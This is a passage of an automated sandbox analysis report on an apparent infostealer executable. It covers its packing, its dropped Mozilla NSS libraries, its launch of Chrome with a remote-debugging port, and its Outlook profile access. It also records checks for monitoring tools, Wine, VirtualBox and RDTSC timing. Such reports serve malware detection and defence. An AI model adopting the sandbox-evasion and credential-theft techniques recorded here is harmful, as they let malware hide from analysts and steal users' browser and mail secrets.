              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C6785500_2_6C678550
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5925600_2_6C592560
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5BE5F00_2_6C5BE5F0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5FA5E00_2_6C5FA5E0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5245B00_2_6C5245B0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C58C6500_2_6C58C650
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5546D00_2_6C5546D0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C58E6E00_2_6C58E6E0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5CE6E00_2_6C5CE6E0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5B07000_2_6C5B0700
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C55A7D00_2_6C55A7D0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C57E0700_2_6C57E070
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5F80100_2_6C5F8010
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5FC0000_2_6C5FC000
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5280900_2_6C528090
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C60C0B00_2_6C60C0B0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5400B00_2_6C5400B0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5981400_2_6C598140
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C6141300_2_6C614130
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5A61300_2_6C5A6130
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5301E00_2_6C5301E0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5C82500_2_6C5C8250
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5B82600_2_6C5B8260
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C6082200_2_6C608220
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5FA2100_2_6C5FA210
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C6B62C00_2_6C6B62C0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C6022A00_2_6C6022A0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5FE2B00_2_6C5FE2B0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C64C3600_2_6C64C360
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5383400_2_6C538340
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C6723700_2_6C672370
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5323700_2_6C532370
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5C63700_2_6C5C6370
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5A23200_2_6C5A2320
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5843E00_2_6C5843E0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C58E3B00_2_6C58E3B0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5623A00_2_6C5623A0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C533C400_2_6C533C40
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C659C400_2_6C659C40
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C541C300_2_6C541C30
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C66DCD00_2_6C66DCD0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5F1CE00_2_6C5F1CE0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5CFC800_2_6C5CFC80
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C593D000_2_6C593D00
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C601DC00_2_6C601DC0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C523D800_2_6C523D80
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C679D900_2_6C679D90
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C6B5E600_2_6C6B5E60
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C68BE700_2_6C68BE70
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C63DE100_2_6C63DE10
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C553EC00_2_6C553EC0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C687F200_2_6C687F20
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C525F300_2_6C525F30
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C565F200_2_6C565F20
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C64DFC00_2_6C64DFC0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C6B3FC00_2_6C6B3FC0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5DBFF00_2_6C5DBFF0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C551F900_2_6C551F90
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C58D8100_2_6C58D810
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C60F8F00_2_6C60F8F0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C68B8F00_2_6C68B8F0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5CF8C00_2_6C5CF8C0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C53D8E00_2_6C53D8E0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5638E00_2_6C5638E0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5AF9600_2_6C5AF960
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5ED9600_2_6C5ED960
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C67F9000_2_6C67F900
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5E59200_2_6C5E5920
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5699D00_2_6C5699D0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5C99C00_2_6C5C99C0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5959F00_2_6C5959F0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5C79F00_2_6C5C79F0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5419800_2_6C541980
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C6019900_2_6C601990
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C6B9A500_2_6C6B9A50
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C56FA100_2_6C56FA10
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5D1A100_2_6C5D1A10
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C62DA300_2_6C62DA30
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C531AE00_2_6C531AE0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C60DAB00_2_6C60DAB0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C60FB600_2_6C60FB60
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C57BB200_2_6C57BB20
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C577BF00_2_6C577BF0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C521B800_2_6C521B80
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5F9BB00_2_6C5F9BB0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C615B900_2_6C615B90
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C589BA00_2_6C589BA0
              Source: C:\Users\user\Desktop\random(1).exeCode function: String function: 6C559B10 appears 97 times
              Source: C:\Users\user\Desktop\random(1).exeCode function: String function: 6C6B09D0 appears 147 times
              Source: C:\Users\user\Desktop\random(1).exeCode function: String function: 6C553620 appears 93 times
              Source: C:\Users\user\Desktop\random(1).exeCode function: String function: 6C58C5E0 appears 35 times
              Source: C:\Users\user\Desktop\random(1).exeCode function: String function: 6C669F30 appears 50 times
              Source: random(1).exe, 00000000.00000002.2028991333.000000006F902000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs random(1).exe
              Source: random(1).exe, 00000000.00000002.2028835685.000000006C705000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs random(1).exe
              Source: random(1).exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: random(1).exeStatic PE information: Section: fsoqnkix ZLIB complexity 0.995146165615727
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@17/36@6/7
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C590300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,0_2_6C590300
              Source: C:\Users\user\Desktop\random(1).exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\OI5WW9ZK.htmJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
              Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
              Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
              Source: random(1).exe, random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
              Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
              Source: random(1).exe, 00000000.00000003.1902604599.0000000005565000.00000004.00000020.00020000.00000000.sdmp, FHIDAFHCBAKFCAAKFCFC.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
              Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
              Source: random(1).exeReversingLabs: Detection: 78%
              Source: random(1).exeVirustotal: Detection: 77%
              Source: random(1).exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: unknownProcess created: C:\Users\user\Desktop\random(1).exe "C:\Users\user\Desktop\random(1).exe"
              Source: C:\Users\user\Desktop\random(1).exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 --field-trial-handle=2280,i,4646147605048899530,4272269093725665048,262144 /prefetch:8
              Source: C:\Users\user\Desktop\random(1).exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 --field-trial-handle=2280,i,4646147605048899530,4272269093725665048,262144 /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeSection loaded: mozglue.dllJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeSection loaded: msvcp140.dllJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
              Source: random(1).exeStatic file information: File size 1833472 > 1048576
              Source: random(1).exeStatic PE information: Raw size of fsoqnkix is bigger than: 0x100000 < 0x1a5400
              Source: Binary string: mozglue.pdbP source: random(1).exe, 00000000.00000002.2028941439.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
              Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
              Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
              Source: Binary string: nss3.pdb@ source: random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
              Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
              Source: Binary string: nss3.pdb source: random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
              Source: Binary string: mozglue.pdb source: random(1).exe, 00000000.00000002.2028941439.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
              Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\random(1).exeUnpacked PE file: 0.2.random(1).exe.c80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fsoqnkix:EW;axozysaw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fsoqnkix:EW;axozysaw:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: random(1).exeStatic PE information: real checksum: 0x1cabc1 should be: 0x1c8de0
              Source: random(1).exeStatic PE information: section name:
              Source: random(1).exeStatic PE information: section name: .idata
              Source: random(1).exeStatic PE information: section name:
              Source: random(1).exeStatic PE information: section name: fsoqnkix
              Source: random(1).exeStatic PE information: section name: axozysaw
              Source: random(1).exeStatic PE information: section name: .taggant
              Source: freebl3.dll.0.drStatic PE information: section name: .00cfg
              Source: freebl3[1].dll.0.drStatic PE information: section name: .00cfg
              Source: mozglue.dll.0.drStatic PE information: section name: .00cfg
              Source: mozglue[1].dll.0.drStatic PE information: section name: .00cfg
              Source: msvcp140.dll.0.drStatic PE information: section name: .didat
              Source: msvcp140[1].dll.0.drStatic PE information: section name: .didat
              Source: nss3.dll.0.drStatic PE information: section name: .00cfg
              Source: nss3[1].dll.0.drStatic PE information: section name: .00cfg
              Source: softokn3.dll.0.drStatic PE information: section name: .00cfg
              Source: softokn3[1].dll.0.drStatic PE information: section name: .00cfg
              Source: random(1).exeStatic PE information: section name: fsoqnkix entropy: 7.955262014812053
              Source: C:\Users\user\Desktop\random(1).exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
              Source: C:\Users\user\Desktop\random(1).exeFile created: C:\ProgramData\nss3.dllJump to dropped file
              Source: C:\Users\user\Desktop\random(1).exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
              Source: C:\Users\user\Desktop\random(1).exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\random(1).exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\random(1).exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\random(1).exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\random(1).exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
              Source: C:\Users\user\Desktop\random(1).exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\random(1).exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
              Source: C:\Users\user\Desktop\random(1).exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\random(1).exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
              Source: C:\Users\user\Desktop\random(1).exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
              Source: C:\Users\user\Desktop\random(1).exeFile created: C:\ProgramData\nss3.dllJump to dropped file
              Source: C:\Users\user\Desktop\random(1).exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
              Source: C:\Users\user\Desktop\random(1).exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
              Source: C:\Users\user\Desktop\random(1).exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
              Source: C:\Users\user\Desktop\random(1).exeFile created: C:\ProgramData\softokn3.dllJump to dropped file

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\random(1).exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeWindow searched: window name: RegmonclassJump to behavior

              Malware Analysis System Evasion

              barindex
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\random(1).exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1050836 second address: 105083F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 105083F second address: 1050869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F06D8B4D9D7h 0x0000000c js 00007F06D8B4D9CCh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1050A19 second address: 1050A1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1050A1D second address: 1050A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F06D8B4D9D8h 0x00000015 rdtsc
